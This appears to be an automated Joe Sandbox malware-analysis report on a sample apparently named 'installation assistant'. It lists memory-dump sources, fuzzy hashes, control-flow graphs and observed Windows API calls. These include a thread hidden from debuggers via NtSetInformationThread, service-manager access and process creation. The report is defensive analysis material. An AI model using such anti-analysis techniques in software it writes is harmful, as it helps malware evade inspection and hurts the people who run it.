                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: Thread$CurrentInformation
                                        • String ID:
                                        • API String ID: 1650627709-0
                                        • Opcode ID: dfa57eec48cae62a4fbb3794a3f6af5c372930426b5c9c75a22176b35f8556e1
                                        • Instruction ID: ab35430f9fc86ffd59ef3c41ee7c7716d9f7a0525650ec342e35f8974679f362
                                        • Opcode Fuzzy Hash: dfa57eec48cae62a4fbb3794a3f6af5c372930426b5c9c75a22176b35f8556e1
                                        • Instruction Fuzzy Hash: EA312331106781CFC720CF28C4A0796B7F6AF91304F294A1CC0A65BA81EB71B445CB92
                                        APIs
                                        • GetCurrentThread.KERNEL32 ref: 6CB83E9D
                                        • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6CB83EAA
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: Thread$CurrentInformation
                                        • String ID:
                                        • API String ID: 1650627709-0
                                        • Opcode ID: f05b6709f02e0e46cf0042bfaf8ad45a7927788d72256cab14e149eb8f829801
                                        • Instruction ID: 955d531381050616bfa262f590c8c018415d4dfb8591a47dad4ca88f279a0749
                                        • Opcode Fuzzy Hash: f05b6709f02e0e46cf0042bfaf8ad45a7927788d72256cab14e149eb8f829801
                                        • Instruction Fuzzy Hash: C921383011A781CFD724CF24C8A479677B6AF52304F154A1DC0A64BA80EB75B004CB92
                                        APIs
                                        • OpenSCManagerA.SECHOST(00000000,00000000,00000001), ref: 6CD03F40
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: ManagerOpen
                                        • String ID:
                                        • API String ID: 1889721586-0
                                        • Opcode ID: a97e233bbaf818811dae27631201be7f802020c68ea4aa11fee9398dcaecefb1
                                        • Instruction ID: 8f37876526a3016d860a86eeb37788e2e051742f26043330273b00c6d46ffa44
                                        • Opcode Fuzzy Hash: a97e233bbaf818811dae27631201be7f802020c68ea4aa11fee9398dcaecefb1
                                        • Instruction Fuzzy Hash: 7B312874608342AFC700CF29C888A1ABFF1AF99754F14885EF498C7262C775D844DBA3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: "OP$#OP$#OP$+duH$+duH$/+p8$/+p8$H$J\$J\$P$Rr!A$Sr!A$Sr!A$p
                                        • API String ID: 0-2001680094
                                        • Opcode ID: 8d4b640db0d403a7c4fb8037565728003368f4e5b7f024a779270e16d5c7fde5
                                        • Instruction ID: 69feee49134dd4d6079f1390a90a119eaccdf6565626b557b3aa930877e10dee
                                        • Opcode Fuzzy Hash: 8d4b640db0d403a7c4fb8037565728003368f4e5b7f024a779270e16d5c7fde5
                                        • Instruction Fuzzy Hash: 0CA29BB460D3818FC724CF19C49066ABBE2ABD9318F298D1EF698C7751E634E446CB53

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 3914 6cd1b8f3-6cd1b903 3915 6cd1b905-6cd1b918 call 6cd0e7ff call 6cd0e7ec 3914->3915 3916 6cd1b91d-6cd1b91f 3914->3916 3932 6cd1bc9c 3915->3932 3918 6cd1b925-6cd1b92b 3916->3918 3919 6cd1bc84-6cd1bc91 call 6cd0e7ff call 6cd0e7ec 3916->3919 3918->3919 3922 6cd1b931-6cd1b957 3918->3922 3937 6cd1bc97 call 6cd0ef40 3919->3937 3922->3919 3925 6cd1b95d-6cd1b966 3922->3925 3928 6cd1b980-6cd1b982 3925->3928 3929 6cd1b968-6cd1b97b call 6cd0e7ff call 6cd0e7ec 3925->3929 3930 6cd1bc80-6cd1bc82 3928->3930 3931 6cd1b988-6cd1b98b 3928->3931 3929->3937 3936 6cd1bc9f-6cd1bca2 3930->3936 3931->3930 3935 6cd1b991-6cd1b995 3931->3935 3932->3936 3935->3929 3939 6cd1b997-6cd1b9ae 3935->3939 3937->3932 3942 6cd1b9b0-6cd1b9b3 3939->3942 3943 6cd1b9ff-6cd1ba05 3939->3943 3947 6cd1b9c3-6cd1b9c9 3942->3947 3948 6cd1b9b5-6cd1b9be 3942->3948 3945 6cd1ba07-6cd1ba11 3943->3945 3946 6cd1b9cb-6cd1b9e2 call 6cd0e7ff call 6cd0e7ec call 6cd0ef40 3943->3946 3949 6cd1ba13-6cd1ba15 3945->3949 3950 6cd1ba18-6cd1ba36 call 6cd13615 call 6cd135db * 2 3945->3950 3981 6cd1bbb7 3946->3981 3947->3946 3952 6cd1b9e7-6cd1b9fa 3947->3952 3951 6cd1ba83-6cd1ba93 3948->3951 3949->3950 3985 6cd1ba53-6cd1ba7c call 6cd19a89 3950->3985 3986 6cd1ba38-6cd1ba4e call 6cd0e7ec call 6cd0e7ff 3950->3986 3954 6cd1ba99-6cd1baa5 3951->3954 3955 6cd1bb58-6cd1bb61 call 6cd20805 3951->3955 3952->3951 3954->3955 3958 6cd1baab-6cd1baad 3954->3958 3969 6cd1bb63-6cd1bb75 3955->3969 3970 6cd1bbd4 3955->3970 3958->3955 3962 6cd1bab3-6cd1bad7 3958->3962 3962->3955 3966 6cd1bad9-6cd1baef 3962->3966 3966->3955 3971 6cd1baf1-6cd1baf3 3966->3971 3969->3970 3975 6cd1bb77-6cd1bb86 GetConsoleMode 3969->3975 3973 6cd1bbd8-6cd1bbf0 ReadFile 3970->3973 3971->3955 3977 6cd1baf5-6cd1bb1b 3971->3977 3979 6cd1bbf2-6cd1bbf8 3973->3979 3980 6cd1bc4c-6cd1bc57 GetLastError 3973->3980 3975->3970 3976 6cd1bb88-6cd1bb8c 3975->3976 3976->3973 3982 6cd1bb8e-6cd1bba8 ReadConsoleW 3976->3982 3977->3955 3984 6cd1bb1d-6cd1bb33 3977->3984 3979->3980 3989 6cd1bbfa 3979->3989 3987 6cd1bc70-6cd1bc73 3980->3987 3988 6cd1bc59-6cd1bc6b call 6cd0e7ec call 6cd0e7ff 3980->3988 3983 6cd1bbba-6cd1bbc4 call 6cd135db 3981->3983 3990 6cd1bbc9-6cd1bbd2 3982->3990 3991 6cd1bbaa GetLastError 3982->3991 3983->3936 3984->3955 3995 6cd1bb35-6cd1bb37 3984->3995 3985->3951 3986->3981 3992 6cd1bbb0-6cd1bbb6 call 6cd0e812 3987->3992 3993 6cd1bc79-6cd1bc7b 3987->3993 3988->3981 3999 6cd1bbfd-6cd1bc0f 3989->3999 3990->3999 3991->3992 3992->3981 3993->3983 3995->3955 4004 6cd1bb39-6cd1bb53 3995->4004 3999->3983 4001 6cd1bc11-6cd1bc15 3999->4001 4008 6cd1bc17-6cd1bc27 call 6cd1bd1e 4001->4008 4009 6cd1bc2e-6cd1bc39 4001->4009 4004->3955 4020 6cd1bc2a-6cd1bc2c 4008->4020 4014 6cd1bc45-6cd1bc4a call 6cd1bfd6 4009->4014 4015 6cd1bc3b call 6cd1bca3 4009->4015 4021 6cd1bc40-6cd1bc43 4014->4021 4015->4021 4020->3983 4021->4020
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 8Q
                                        • API String ID: 0-4022487301
                                        • Opcode ID: fc74c7aacf0783fd0dc7fc412b8e09cd7bf6c4e104bd1ee89eb605b978a84104
                                        • Instruction ID: 126f4bfd330ed55a7e406cf38fedc39a73f32de5bbbd9d6532825ae8acab1c73
                                        • Opcode Fuzzy Hash: fc74c7aacf0783fd0dc7fc412b8e09cd7bf6c4e104bd1ee89eb605b978a84104
                                        • Instruction Fuzzy Hash: FBC1F8B0B08245EFDF05CFA9D880BADBBB1AF4A318F104159E55497FE1CB359A05CBA1

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 4023 6cd22e8c-6cd22ebc call 6cd2330c 4026 6cd22ed7-6cd22ee3 call 6cd2042c 4023->4026 4027 6cd22ebe-6cd22ec9 call 6cd0e7ff 4023->4027 4032 6cd22ee5-6cd22efa call 6cd0e7ff call 6cd0e7ec 4026->4032 4033 6cd22efc-6cd22f45 call 6cd23277 4026->4033 4034 6cd22ecb-6cd22ed2 call 6cd0e7ec 4027->4034 4032->4034 4043 6cd22fb2-6cd22fbb GetFileType 4033->4043 4044 6cd22f47-6cd22f50 4033->4044 4041 6cd231b1-6cd231b5 4034->4041 4045 6cd23004-6cd23007 4043->4045 4046 6cd22fbd-6cd22fee GetLastError call 6cd0e812 CloseHandle 4043->4046 4048 6cd22f52-6cd22f56 4044->4048 4049 6cd22f87-6cd22fad GetLastError call 6cd0e812 4044->4049 4052 6cd23010-6cd23016 4045->4052 4053 6cd23009-6cd2300e 4045->4053 4046->4034 4062 6cd22ff4-6cd22fff call 6cd0e7ec 4046->4062 4048->4049 4054 6cd22f58-6cd22f85 call 6cd23277 4048->4054 4049->4034 4058 6cd2301a-6cd23068 call 6cd205d0 4052->4058 4059 6cd23018 4052->4059 4053->4058 4054->4043 4054->4049 4065 6cd23087-6cd230af call 6cd23530 4058->4065 4066 6cd2306a-6cd23076 call 6cd23486 4058->4066 4059->4058 4062->4034 4073 6cd230b1-6cd230b2 4065->4073 4074 6cd230b4-6cd230f5 4065->4074 4066->4065 4072 6cd23078 4066->4072 4075 6cd2307a-6cd23082 call 6cd1a745 4072->4075 4073->4075 4076 6cd23116-6cd23124 4074->4076 4077 6cd230f7-6cd230fb 4074->4077 4075->4041 4079 6cd2312a-6cd2312e 4076->4079 4080 6cd231af 4076->4080 4077->4076 4078 6cd230fd-6cd23111 4077->4078 4078->4076 4079->4080 4082 6cd23130-6cd23163 CloseHandle call 6cd23277 4079->4082 4080->4041 4086 6cd23197-6cd231ab 4082->4086 4087 6cd23165-6cd23191 GetLastError call 6cd0e812 call 6cd2053f 4082->4087 4086->4080 4087->4086
                                        APIs
                                          • Part of subcall function 6CD23277: CreateFileW.KERNEL32(00000000,00000000,?,6CD22F35,?,?,00000000,?,6CD22F35,00000000,0000000C), ref: 6CD23294
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CD22FA0
                                        • __dosmaperr.LIBCMT ref: 6CD22FA7
                                        • GetFileType.KERNEL32(00000000), ref: 6CD22FB3
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CD22FBD
                                        • __dosmaperr.LIBCMT ref: 6CD22FC6
                                        • CloseHandle.KERNEL32(00000000), ref: 6CD22FE6
                                        • CloseHandle.KERNEL32(6CD19EF0), ref: 6CD23133
                                        • GetLastError.KERNEL32 ref: 6CD23165
                                        • __dosmaperr.LIBCMT ref: 6CD2316C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                        • String ID: 8Q
                                        • API String ID: 4237864984-4022487301
                                        • Opcode ID: ffca626cffeb893052e9eeaf360e7edda48bf897049958c73ee7de9ebcfa760f
                                        • Instruction ID: 851a07f41053d9f2cbdc6569988301496e1ae7ba467ea0c1c7b604df2a0b87ea
                                        • Opcode Fuzzy Hash: ffca626cffeb893052e9eeaf360e7edda48bf897049958c73ee7de9ebcfa760f
                                        • Instruction Fuzzy Hash: 94A15632B141448FCF199F68C890BEE7BB4AB4732CF18015DE950EB7A0CB398816C7A1

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 4092 6ccdb750-6ccdb7c0 call 6cd05990 call 6cd0a740 4097 6ccdb7e6-6ccdb7ef 4092->4097 4098 6ccdb7f1-6ccdb7f6 4097->4098 4099 6ccdb850-6ccdb855 4097->4099 4100 6ccdb7fc-6ccdb801 4098->4100 4101 6ccdb8b0-6ccdb8b5 4098->4101 4102 6ccdb85b-6ccdb860 4099->4102 4103 6ccdb950-6ccdb955 4099->4103 4104 6ccdb9ac-6ccdb9b1 4100->4104 4105 6ccdb807-6ccdb80c 4100->4105 4110 6ccdba0e-6ccdba13 4101->4110 4111 6ccdb8bb-6ccdb8c0 4101->4111 4108 6ccdb9dd-6ccdb9e2 4102->4108 4109 6ccdb866-6ccdb86b 4102->4109 4106 6ccdb95b-6ccdb960 4103->4106 4107 6ccdba75-6ccdba7a 4103->4107 4124 6ccdb9b7-6ccdb9bc 4104->4124 4125 6ccdbbf1-6ccdbbf6 4104->4125 4114 6ccdbab6-6ccdbabb 4105->4114 4115 6ccdb812-6ccdb817 4105->4115 4118 6ccdbb9a-6ccdbb9f 4106->4118 4119 6ccdb966-6ccdb96b 4106->4119 4122 6ccdbcdb-6ccdbce0 4107->4122 4123 6ccdba80-6ccdba85 4107->4123 4112 6ccdbc2c-6ccdbc31 4108->4112 4113 6ccdb9e8-6ccdb9ed 4108->4113 4120 6ccdbafa-6ccdbaff 4109->4120 4121 6ccdb871-6ccdb876 4109->4121 4116 6ccdbc79-6ccdbc7e 4110->4116 4117 6ccdba19-6ccdba1e 4110->4117 4126 6ccdbb48-6ccdbb4d 4111->4126 4127 6ccdb8c6-6ccdb8cb 4111->4127 4136 6ccdbc37-6ccdbc3c 4112->4136 4137 6ccdc162-6ccdc193 4112->4137 4128 6ccdbf46-6ccdbf81 call 6cd0a740 call 6ccda500 4113->4128 4129 6ccdb9f3-6ccdb9f8 4113->4129 4144 6ccdc026-6ccdc04e 4114->4144 4145 6ccdbac1-6ccdbac6 4114->4145 4130 6ccdb81d-6ccdb822 4115->4130 4131 6ccdbd16-6ccdbd1b 4115->4131 4142 6ccdbc84-6ccdbc89 4116->4142 4143 6ccdc1c7-6ccdc1f6 4116->4143 4134 6ccdbfab-6ccdbfcb 4117->4134 4135 6ccdba24-6ccdba29 4117->4135 4156 6ccdbba5-6ccdbbaa 4118->4156 4157 6ccdc0e0-6ccdc10c 4118->4157 4152 6ccdbe2a-6ccdbe2f 4119->4152 4153 6ccdb971-6ccdb976 4119->4153 4150 6ccdbb05-6ccdbb0a 4120->4150 4151 6ccdc082-6ccdc099 4120->4151 4138 6ccdb87c-6ccdb881 4121->4138 4139 6ccdbd43-6ccdbd48 4121->4139 4148 6ccdc22e-6ccdc23e 4122->4148 4149 6ccdbce6-6ccdbceb 4122->4149 4140 6ccdba8b-6ccdba90 4123->4140 4141 6ccdbff5-6ccdc005 4123->4141 4158 6ccdbebc-6ccdbf24 4124->4158 4159 6ccdb9c2-6ccdb9c7 4124->4159 4132 6ccdc13d-6ccdc15d 4125->4132 4133 6ccdbbfc-6ccdbc01 4125->4133 4154 6ccdbc9a-6ccdbcd6 4126->4154 4155 6ccdbb53-6ccdbb58 4126->4155 4146 6ccdbda6-6ccdbdab 4127->4146 4147 6ccdb8d1-6ccdb8d6 4127->4147 4227 6ccdbf86-6ccdbfa6 4128->4227 4162 6ccdbdfd-6ccdbe25 4129->4162 4163 6ccdb9fe-6ccdba03 4129->4163 4178 6ccdb828-6ccdb82d 4130->4178 4179 6ccdbdd0-6ccdbdf8 4130->4179 4191 6ccdbd21-6ccdbd26 4131->4191 4192 6ccdc262-6ccdc286 4131->4192 4132->4097 4133->4154 4180 6ccdbc07-6ccdbc0c 4133->4180 4134->4097 4164 6ccdba2f-6ccdba34 4135->4164 4165 6ccdbfd0-6ccdbff0 4135->4165 4181 6ccdc198-6ccdc1c2 call 6cd0a1c0 4136->4181 4182 6ccdbc42-6ccdbc47 4136->4182 4137->4097 4183 6ccdb887-6ccdb88c 4138->4183 4184 6ccdb7c2-6ccdb7d3 4138->4184 4193 6ccdbd4e-6ccdbd53 4139->4193 4194 6ccdc28b-6ccdc29b 4139->4194 4167 6ccdc00f-6ccdc01c 4140->4167 4168 6ccdba96-6ccdba9b 4140->4168 4141->4167 4185 6ccdbc8f-6ccdbc94 4142->4185 4186 6ccdc1fb-6ccdc229 4142->4186 4143->4097 4171 6ccdc054-6ccdc05c 4144->4171 4169 6ccdbacc-6ccdbad1 4145->4169 4170 6ccdc061-6ccdc07a 4145->4170 4146->4179 4197 6ccdbdad-6ccdbdb2 4146->4197 4187 6ccdb8dc-6ccdb8e1 4147->4187 4188 6ccdbe83-6ccdbe93 4147->4188 4189 6ccdc248-6ccdc258 4148->4189 4149->4189 4190 6ccdbcf1-6ccdbcf6 4149->4190 4172 6ccdbb10-6ccdbb15 4150->4172 4173 6ccdc0a3-6ccdc0c3 4150->4173 4151->4173 4160 6ccdc2a5-6ccdc2aa 4152->4160 4161 6ccdbe35-6ccdbe7e 4152->4161 4195 6ccdbe9d-6ccdbeb7 4153->4195 4196 6ccdb97c-6ccdb981 4153->4196 4154->4097 4174 6ccdbb5e-6ccdbb63 4155->4174 4175 6ccdc0c8-6ccdc0d8 4155->4175 4176 6ccdc111-6ccdc138 4156->4176 4177 6ccdbbb0-6ccdbbb5 4156->4177 4157->4097 4158->4097 4198 6ccdb9cd-6ccdb9d2 4159->4198 4199 6ccdbf29-6ccdbf3e 4159->4199 4160->4097 4215 6ccdc2b0-6ccdc2bb 4160->4215 4200 6ccdb7e0-6ccdb7e4 4161->4200 4162->4097 4163->4179 4201 6ccdba09 4163->4201 4164->4097 4202 6ccdba3a-6ccdba70 4164->4202 4165->4097 4167->4144 4168->4097 4204 6ccdbaa1-6ccdbab1 4168->4204 4169->4097 4205 6ccdbad7-6ccdbaf1 4169->4205 4170->4151 4171->4097 4172->4097 4206 6ccdbb1b-6ccdbb43 4172->4206 4173->4097 4174->4097 4207 6ccdbb69-6ccdbb95 4174->4207 4175->4157 4176->4097 4177->4097 4209 6ccdbbbb-6ccdbbec call 6ccd18a0 call 6ccd18b0 4177->4209 4178->4097 4211 6ccdb82f-6ccdb841 4178->4211 4179->4097 4180->4097 4212 6ccdbc12-6ccdbc27 4180->4212 4181->4097 4182->4097 4213 6ccdbc4d-6ccdbc74 4182->4213 4183->4097 4214 6ccdb892-6ccdb89f 4183->4214 4208 6ccdb7d8-6ccdb7dd 4184->4208 4185->4097 4185->4154 4186->4097 4187->4097 4216 6ccdb8e7-6ccdb94a call 6ccdc2c0 CreateFileA 4187->4216 4188->4195 4189->4192 4190->4097 4217 6ccdbcfc-6ccdbd11 4190->4217 4191->4097 4218 6ccdbd2c-6ccdbd39 4191->4218 4192->4097 4193->4097 4219 6ccdbd59-6ccdbda1 4193->4219 4194->4160 4195->4200 4196->4097 4220 6ccdb987-6ccdb9a7 4196->4220 4197->4097 4221 6ccdbdb8-6ccdbdc8 4197->4221 4198->4162 4222 6ccdb9d8 4198->4222 4199->4128 4200->4097 4201->4097 4202->4097 4204->4200 4205->4120 4206->4097 4207->4097 4208->4200 4209->4097 4211->4200 4212->4097 4213->4097 4214->4208 4216->4097 4217->4097 4218->4139 4219->4097 4220->4171 4221->4179 4222->4097 4227->4097
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 1:x$1:x$wtU'$xtU'$xtU'
                                        • API String ID: 0-2932700092
                                        • Opcode ID: fd67055da992ab2e05ba2853e071c307d530eb85897099bd043cd333ccc0dbaf
                                        • Instruction ID: c45ba3e6034cd6aca64da01c71d878844fba931e2bfc91f4cdf48735c2139ebd
                                        • Opcode Fuzzy Hash: fd67055da992ab2e05ba2853e071c307d530eb85897099bd043cd333ccc0dbaf
                                        • Instruction Fuzzy Hash: 4F52237460D3829FC714CE29C4A062EBBE1BFCA214F26895EF595C7750E634E885CB63
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ;T55
                                        • API String ID: 0-2572755013
                                        • Opcode ID: 21b39c83c38fc4ae6e7a1707f904b2c0bf9ffaa8e8e84b5ba613dd9fd20e4606
                                        • Instruction ID: ef66f9827c86a776ed4408243aad9e1c87b11e747c1df88c693b29c6f6548ec9
                                        • Opcode Fuzzy Hash: 21b39c83c38fc4ae6e7a1707f904b2c0bf9ffaa8e8e84b5ba613dd9fd20e4606
                                        • Instruction Fuzzy Hash: 3603D331645B818FC728CF28C8D0696B7E3EFD63247198B7DC0A64BA95DB74B44ACB50

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 4627 6cd03e00-6cd03e87 CreateProcessA 4628 6cd03eab-6cd03eb4 4627->4628 4629 6cd03ed0-6cd03f1a WaitForSingleObject CloseHandle * 2 4628->4629 4630 6cd03eb6-6cd03ebb 4628->4630 4629->4628 4631 6cd03e90-6cd03ea3 4630->4631 4632 6cd03ebd-6cd03ec2 4630->4632 4631->4628 4632->4628 4633 6cd03ec4-6cd03f27 4632->4633
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: CloseHandle$CreateObjectProcessSingleWait
                                        • String ID: D
                                        • API String ID: 2059082233-2746444292
                                        • Opcode ID: 8d18c427c36df0d97f6ddb28370662387594c8db9d8558480021f16363ae8d53
                                        • Instruction ID: 2719b85aa7f7d2fe974d4a59bd0a0d7ed29b5105fdfbad803b0c8d00aabd8c11
                                        • Opcode Fuzzy Hash: 8d18c427c36df0d97f6ddb28370662387594c8db9d8558480021f16363ae8d53
                                        • Instruction Fuzzy Hash: E631E2B1A093808FD750DF28C19875ABBF0AB99308F505A1EF8D997260E775E584CF43

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
